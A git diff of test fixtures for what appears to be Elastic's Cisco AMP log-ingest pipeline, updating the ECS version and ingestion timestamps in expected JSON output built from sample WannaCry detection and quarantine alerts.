rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json index c2aa4b46070..d7f77b936f5 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -28,7 +28,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094001496Z", + "ingested": "2021-09-13T18:07:42.929459130Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -83,7 +83,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -103,7 +103,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094015339Z", + "ingested": "2021-09-13T18:07:42.929464236Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -158,7 +158,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -178,7 +178,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094017473Z", + "ingested": "2021-09-13T18:07:42.929466403Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -233,7 +233,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -253,7 +253,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094019533Z", + "ingested": "2021-09-13T18:07:42.929468348Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -308,7 +308,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -328,7 +328,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094021497Z", + "ingested": "2021-09-13T18:07:42.929470269Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -383,7 +383,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -403,7 +403,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094023420Z", + "ingested": "2021-09-13T18:07:42.929472180Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -460,7 +460,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -490,7 +490,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094025345Z", + "ingested": "2021-09-13T18:07:42.929474079Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -554,7 +554,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -586,7 +586,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094027258Z", + "ingested": "2021-09-13T18:07:42.929476066Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -645,7 +645,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -675,7 +675,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094029167Z", + "ingested": "2021-09-13T18:07:42.929477971Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -730,7 +730,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -760,7 +760,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094031077Z", + "ingested": "2021-09-13T18:07:42.929479867Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -813,7 +813,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -833,7 +833,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094032961Z", + "ingested": "2021-09-13T18:07:42.929481750Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -884,7 +884,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -904,7 +904,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094035008Z", + "ingested": "2021-09-13T18:07:42.929483818Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -955,7 +955,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -975,7 +975,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094036925Z", + "ingested": "2021-09-13T18:07:42.929485735Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -1028,7 +1028,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1058,7 +1058,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094038843Z", + "ingested": "2021-09-13T18:07:42.929487600Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1124,7 +1124,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1156,7 +1156,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094040732Z", + "ingested": "2021-09-13T18:07:42.929489505Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1224,7 +1224,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1256,7 +1256,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094042624Z", + "ingested": "2021-09-13T18:07:42.929491390Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat 